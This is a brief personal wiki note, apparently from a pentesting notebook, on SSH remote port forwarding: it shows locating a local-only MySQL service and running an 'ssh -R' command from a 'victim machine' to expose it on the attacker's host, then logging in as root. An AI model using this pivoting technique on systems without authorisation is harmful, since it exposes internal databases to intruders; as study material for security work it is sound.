Content-Type: text/x-zim-wiki
Wiki-Format: zim 0.4
Creation-Date: 2020-06-06T03:11:25-04:00

====== port fordwaing ======
Created Saturday 06 June 2020

lets take a example of mysql port forward

mysql default port is 3306

**netstat -nl**
or
**ss -tulnp**

show all active internet connection is mysql is present it looks like
**0 127.0.0.1:3306**


lets fordard this to aur machine


====== from victim machine ======
**ssh  -R 4444:127.0.0.1:3306 root@{our_ip}**

 
-R remote
-L local

====== on our machine ======

**mysql -u root -h 127.0.0.1 -P 4444**

confirm this 
**select @@hostname**
